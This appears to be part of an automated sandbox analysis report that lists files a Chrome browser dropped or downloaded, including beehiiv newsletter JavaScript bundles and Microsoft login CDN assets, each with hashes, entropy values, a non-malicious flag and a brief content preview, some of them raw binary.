                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e2b474c-6bb0-5047-9c77-f6efb75892c1")}catch(e){}}();.import{U as n,C as a}from"./keyboard-CaEu2o0u.js";let l="div";var p=(e=>(e[e.None=1]="None",e[e.Focusable=2]="Focusable",e[e.Hidden=4]="Hidden",e))(p||{});function s(e,o){var d;let{features:i=1,...r}=e,t={ref:o,"aria-hidden":(i&2)===2?!0:(d=r["aria-hidden"])!=null?d:void 0,style:{position:"fixed",top:1,left:1,width:1,height:0,padding:0,margin:-1,overflow:"hidden",clip:"rect(0, 0, 0, 0)",whiteSpace:"nowrap",borderWidth:"0",...(i&4)===4&&(i&2)!==2&&{display:"none"}}};return a({ourProps:t,theirProps:r,slot:{},defaultTag:l,name:"Hidden"})}let h=n(s);export{h as f,p as s};.//# sourceMappingURL=hidden-KuoXmiN5.js.map..//# debugId=7e2b474c-6bb0-5047-9c77-f6efb75892c1.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1601)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1959
                                                                                                                                            Entropy (8bit):5.196871266986563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkERYuNphZAku/nvMuGjkeXNUJTbHXzbPQPnw:QpYUhaku3MuUkeXdnw
                                                                                                                                            MD5:C1DBA8CA65DC87903A3A8967824C1141
                                                                                                                                            SHA1:E7B640CF10ACD0F4AAB03C9CE3562F8D936D7E2F
                                                                                                                                            SHA-256:E7EF6A4E3F11C95005901A680BF9FAC2D851A66622941D248E5BF3514DE07EE0
                                                                                                                                            SHA-512:2A24D031AE90C0C9B01A99B579E5FA77D38166AB73EE3344CAA32325FC97AB66DBCBA514A0E02B593A9DF5A461F49DD35C04EEFB780B7210EA9E0A4787CB74CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0535b280-36bd-5da5-93d3-45fa82042241")}catch(e){}}();.import{j as a}from"./jsx-runtime-BjG_zV1W.js";import{c}from"./index-x2da_zcv.js";const b=({as:o="p",children:t,theme:e="subscribe",size:s="md",weight:r="regular",type:l,className:m=""})=>{const x=c(m,l==="title"&&"wt-header-font",l==="body"&&"wt-body-font",e==="content"&&"text-wt-text-on-background",e==="subscribe-gate"&&"text-wt-background",e==="subscribe-gate-bottom"&&"text-wt-text-on-background",e==="subscribe"&&"text-wt-text-on-subscribe-background",e==="navs"&&"text-wt-text-on-tertiary",e==="default"&&"text-gray-700",e==="primary"&&"text-wt-primary",s==="xs"&&"text-xs sm:text-sm",s==="sm"&&"text-sm",s==="md"&&"text-md",s==="lg"&&"text-md sm:text-lg",s==="xl"&&"text-lg sm:text-xl",s==="2xl"&&"text-xl sm:text-2xl",s==="3xl"
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61052
                                                                                                                                            Entropy (8bit):7.996159932827634
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2478)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2836
                                                                                                                                            Entropy (8bit):5.196141779380909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEUNHBAge31serkXLZ6eT/E3TLXJZJYT+QQGLeYXNsRb+3L:QQiHlkXL4eT/wTLXJ/O+QQIeYXrL
                                                                                                                                            MD5:37E74A5D6999D254BCB2D902CB7F7574
                                                                                                                                            SHA1:F09BB368BD49AD63A9C6B92FD3EE8A62CCF881F4
                                                                                                                                            SHA-256:3155DFD500FC5FE24009BE5EC55EA2AD2CBBFADF26FC54AC380E2CE1E1D44CA3
                                                                                                                                            SHA-512:CCBFBD51EEF44B579FF19803441FD6CF955971DFEA2DCCAB9DAF51D2BAA8C4DC155CA61F77AB3B22FA84FC920D4E5948C409654200ED435CE8079B82E61B1C2F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="018dbf1d-1d14-5469-8ce6-ecef90fdbe8e")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as h}from"./index-x2da_zcv.js";const g=n=>n?n.toLowerCase().split(" ").join("-"):"",j={ariel:"font-ariel",bitter:"font-bitter",courier:"font-courier",didot:"font-didot",garamond:"font-garamond",georgia:"font-georgia",helvetica:"font-helvetica",lora:"font-lora","lucida-console":"font-lucida-console",merriweather:"font-merriweather",monaco:"font-monaco",montserrat:"font-montserrat","open-sans":"font-open_sans",palatino:"font-palatino","playfair-display":"font-playfair-display",poppins:"font-poppins",roboto:"font-roboto","times-new-roman":"font-times-new-roman","trebuchet-ms":"font-trebuchet-ms",verdana:"font-verdana"},C=({as:n="p",children:o,size:a="md",weight:r="regular",cl
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (14684)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):15043
                                                                                                                                            Entropy (8bit):5.32237250424253
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EkkEwXPRj4MLS/7Bru/oM471eVpxFaaYLvCn:EYw/uMu/liBKe+fLvCn
                                                                                                                                            MD5:AC77F9D6B72C13BF61247B4A257CAEC1
                                                                                                                                            SHA1:BD3E776BF62B2118116034E5167112A9E33408AE
                                                                                                                                            SHA-256:D1793A4AA1663F429A67313830A6D15FC2FF5A73EDC4968BF416CEA6E3715CFC
                                                                                                                                            SHA-512:142837960A488EF62D2992F402BA7E1299EAC1CB7EE3FE855D4F24229AE9BD3DF8BB9B9729C65E67A97B5B41585410F093AB372E0057E70131288CA6186F258C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/dialog-CtpHvvfD.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d48d6232-3d16-5628-acfe-6d6e3038fb83")}catch(e){}}();.import{r as s,e as f,R as J}from"./index-D6da9p6-.js";import{p as Be,r as xe}from"./bugs-DVQzBh-s.js";import{o as b,U as P,y as C,f as fe,u as A,C as O,t as pe,b as me,l as ee,O as ue,I as H,a as Ie}from"./keyboard-CaEu2o0u.js";import{n as Ne,s as _,c as We,E as ge,e as Ye,N as Ue,l as K,t as Q}from"./use-root-containers-DmyWFwuo.js";import{O as V,M as R,a as ve,y as D,N as _e}from"./use-is-mounted-BaHv16bB.js";import{n as he,t as je,u as Ve,d as j,y as qe}from"./transition-y-5XFFuu.js";import{f as se,s as ce}from"./hidden-KuoXmiN5.js";import{G as Ge,w as ze}from"./description-BklOXbF-.js";function te(e,t){let n=s.useRef([]),r=b(e);s.useEffect(()=>{let o=[...n.current];for(let[l,i]of t.entries())if(n.current[l]!==i){let a=r(t,
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):116345
                                                                                                                                            Entropy (8bit):7.997378915283506
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                            MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                            SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                            SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                            SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1244)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1602
                                                                                                                                            Entropy (8bit):5.442821573717911
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE52NxupNMRZEez+AT2ru5PGaLBnKwn:Q/pNazQup
                                                                                                                                            MD5:2F18DA5E58951D39DB053DC02B9CE7FF
                                                                                                                                            SHA1:15CE03FEA87D45FAEA923E06DD7CF7D63779F8A9
                                                                                                                                            SHA-256:5E8AED4279489EF6B38E810B265A0A6AB43A40D53D3C5CF79F68D2F1869C6C0A
                                                                                                                                            SHA-512:706EF39955F1AA7B68B036C74AF8B5AB4B388AA0888FF806F76E4E00FE169AEAAFE89C57BA0E0D5A13C6ABC0A3A2C2CC15E53D84FB6F7FC51C98408416D878A4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/Input-snMSpc3o.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6944ee-5681-59fb-88aa-3694eb91cf0b")}catch(e){}}();.import{j as r}from"./jsx-runtime-BjG_zV1W.js";import{r as N}from"./index-D6da9p6-.js";import{T as a}from"./index-CJHGmWl4.js";const k=N.forwardRef((n,C)=>{const{name:o,defaultValue:d,placeholder:c,label:l,labelColor:i,fontColor:m,helperColor:u,disabled:p,onFocus:x,onBlur:g,onChange:h,onKeyDown:b,helperText:s,errorText:t,type:y="text",required:f=!0,value:w,...j}=n;return r.jsxs("div",{className:"space-y-1",children:[l&&r.jsx("label",{htmlFor:o,className:"block text-sm font-medium text-wt-text-on-background",style:{color:i||"#374151"},children:l}),r.jsxs("div",{className:"mt-1",children:[r.jsx("input",{type:y,name:o,id:o,value:w,required:f,defaultValue:d,placeholder:c,disabled:p,onFocus:e=>x?.(e),onBlur:e=>g?.(e),onChange:e=>h?.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1601)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1959
                                                                                                                                            Entropy (8bit):5.196871266986563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkERYuNphZAku/nvMuGjkeXNUJTbHXzbPQPnw:QpYUhaku3MuUkeXdnw
                                                                                                                                            MD5:C1DBA8CA65DC87903A3A8967824C1141
                                                                                                                                            SHA1:E7B640CF10ACD0F4AAB03C9CE3562F8D936D7E2F
                                                                                                                                            SHA-256:E7EF6A4E3F11C95005901A680BF9FAC2D851A66622941D248E5BF3514DE07EE0
                                                                                                                                            SHA-512:2A24D031AE90C0C9B01A99B579E5FA77D38166AB73EE3344CAA32325FC97AB66DBCBA514A0E02B593A9DF5A461F49DD35C04EEFB780B7210EA9E0A4787CB74CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-BdpAPpdN.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0535b280-36bd-5da5-93d3-45fa82042241")}catch(e){}}();.import{j as a}from"./jsx-runtime-BjG_zV1W.js";import{c}from"./index-x2da_zcv.js";const b=({as:o="p",children:t,theme:e="subscribe",size:s="md",weight:r="regular",type:l,className:m=""})=>{const x=c(m,l==="title"&&"wt-header-font",l==="body"&&"wt-body-font",e==="content"&&"text-wt-text-on-background",e==="subscribe-gate"&&"text-wt-background",e==="subscribe-gate-bottom"&&"text-wt-text-on-background",e==="subscribe"&&"text-wt-text-on-subscribe-background",e==="navs"&&"text-wt-text-on-tertiary",e==="default"&&"text-gray-700",e==="primary"&&"text-wt-primary",s==="xs"&&"text-xs sm:text-sm",s==="sm"&&"text-sm",s==="md"&&"text-md",s==="lg"&&"text-md sm:text-lg",s==="xl"&&"text-lg sm:text-xl",s==="2xl"&&"text-xl sm:text-2xl",s==="3xl"
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):608
                                                                                                                                            Entropy (8bit):5.579086285119452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSqX82gNwdOZX8270xo2Ju8Vb0X80:UgqHHVvCaRuSYbgNLZX8g0xol39
                                                                                                                                            MD5:37FD78E2EB6A069A31214F74110BD6C2
                                                                                                                                            SHA1:790B3E2AAE539218CAEA7956F31F28FC41E41F6B
                                                                                                                                            SHA-256:AF13D849DF76BC85E6BFECDDAA0419727310AEE108C5D1E4C8F5936D639E2E6A
                                                                                                                                            SHA-512:64DFE47F24775F894D13ADC0251A913C694759BF02AB7D3009854C8774B61563753698BFB738766D5117E0F9EDE1D271DAC289EB5414123B0CD2F96ABA0ECC84
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useToast-DK42uF07.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ed193780-1927-58d4-9daa-08e3aea056c8")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{n as o}from"./index-CqJN8iQq.js";const p=(s,e)=>{c.useEffect(()=>{if(s){const{status:f,title:r,message:i}=s,t=`${r?`${r}.`:""}${i}`;f==="error"?o.error(t):(o.success(t),e&&e())}},[s])};export{p as u};.//# sourceMappingURL=useToast-DK42uF07.js.map..//# debugId=ed193780-1927-58d4-9daa-08e3aea056c8.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (346)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):710
                                                                                                                                            Entropy (8bit):5.498805342299067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSVqNwE9GYaQD6GG4Fu4ZeZF9px+NDV3iFysTL:UgqHHVvCaRuSVqNJ9Dg4ceeZXD+NDVS5
                                                                                                                                            MD5:08BFB65AB7A43999D670A78A687AA945
                                                                                                                                            SHA1:A9F05DB826CF5B99A322CB6CE1FE2A60B0516928
                                                                                                                                            SHA-256:4CE155C3BE538398CA458963D52CABB01AEB6DC79461BEE31992E0F79361050E
                                                                                                                                            SHA-512:8119BC7197201775C8F126AD3B07C26799E32DAFE8001D4B5707F1FF8F748F45A8B49DFA7BD27E9EA17F4BF14C9D490E264CFA020EDFE1F84494CABCC8865DE7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useIsMobile-onEuuMFV.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f446eac6-05c3-5926-bb4a-1ef48e062217")}catch(e){}}();.import{r as t}from"./index-D6da9p6-.js";const s=640,o=()=>{const[e,i]=t.useState(!1);return t.useEffect(()=>{window.innerWidth<=s&&i(!0)},[]),t.useEffect(()=>{const n=()=>{window.innerWidth<=s&&!e?i(!0):window.innerWidth>s&&e&&i(!1)};return window.addEventListener("resize",n),()=>{window.removeEventListener("resize",n)}},[e]),e};export{o as u};.//# sourceMappingURL=useIsMobile-onEuuMFV.js.map..//# debugId=f446eac6-05c3-5926-bb4a-1ef48e062217.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17174
                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://acctcdn.msauth.net/images/favicon.ico?v=2
                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (26359)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):32343
                                                                                                                                            Entropy (8bit):5.221111329766108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:5qj6zK1QBf6LtQRTV3xyOwEAodFJ8id3PomyCm8s0jUljCGVVt7e2nNxO+o3DmfV:gjWqCNpB2+Lzot9qwZbpjxp
                                                                                                                                            MD5:00964804AA99C7E8C7383A4CECF18957
                                                                                                                                            SHA1:FBF17940DD346EA0B6C368E3D88EFB1E4331D340
                                                                                                                                            SHA-256:58B32E92619A5B476AE0FFF69CBFDC040BD1BADB221E76B20770048CE48C7DF1
                                                                                                                                            SHA-512:068500552F134B8D233DBC3EA7F1E02132DF47ECCE6725D297E35A6245BB0C898FE38FD39C482ED0235B5658E69132549F6E09A350002B159AD0C34780F67CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/AppGlobals-2Br-8bZs.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6d384a-3a0d-58b1-85cf-befc7c1fa2d5")}catch(e){}}();.import{j as kt}from"./jsx-runtime-BjG_zV1W.js";const Et=Object.prototype.toString;function Mt(t){switch(Et.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return F(t,Error)}}function k(t,e){return Et.call(t)===`[object ${e}]`}function cn(t){return k(t,"ErrorEvent")}function un(t){return k(t,"DOMError")}function fn(t){return k(t,"DOMException")}function U(t){return k(t,"String")}function Pt(t){return typeof t=="object"&&t!==null&&"__sentry_template_string__"in t&&"__sentry_template_values__"in t}function dn(t){return t===null||Pt(t)||typeof t!="object"&&typeof t!="function"}function K(t){return k(t,"Object")}function wt(t){return typeof Event<"u"&&F(t,Event)}function Lt(t){ret
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):496
                                                                                                                                            Entropy (8bit):5.473395041029162
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSys8ch8NwtyeWZbDo7592XaqfQs8cht:UgqHHVvCaRuSysx2N5eca9wMsxn
                                                                                                                                            MD5:E9D4FF82237A4CB8FC2FA7AABA53ABC4
                                                                                                                                            SHA1:E907261963EEDC8D0E0619096EA231570457D0F4
                                                                                                                                            SHA-256:0E8048C01ABF8CD2FD001A5C3CF928C6F29B801172CC12149FCA6D7B304AE3EA
                                                                                                                                            SHA-512:BA36CD3C36E83A76EBAE32357DE3B8C02E4F1AAF738AF3367D90F54B25B615140F6B0D63897952D58D71A7E59AFD85E0A5B731439ABC52BB8C44BB9B2862E7F2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2")}catch(e){}}();.const r=(t="")=>{if(!t)return"";try{const n=new URL(t);return n.protocol="https:",n.origin+n.pathname}catch{return""}},o=r;export{o as g};.//# sourceMappingURL=index-BFDoivjB.js.map..//# debugId=d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 981
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):542
                                                                                                                                            Entropy (8bit):7.5641293776931215
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XViE9k3lgyMHbJRUWzRrXeQXz1xmC4+MFsb+/:XViE9kVgpJzooe+MFG+/
                                                                                                                                            MD5:7569D6C5B45AB123E5B8150BB2B3BF22
                                                                                                                                            SHA1:3BE25A250F736FF3B3D809466659E3422C0A3B1B
                                                                                                                                            SHA-256:AA5FEBD7CE526B29249A3D558B4D0CE0021BB4338EE729AD6377A6BE2DABCA3E
                                                                                                                                            SHA-512:CF6721B1B8647705FEF5D18B6A3B0CF7474C3E8667F14C1A013782DD3B21EBB08F6E32052A34B8554FCAA9FC83AF4748EE29ED078AE98154DD047B979A350BD2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
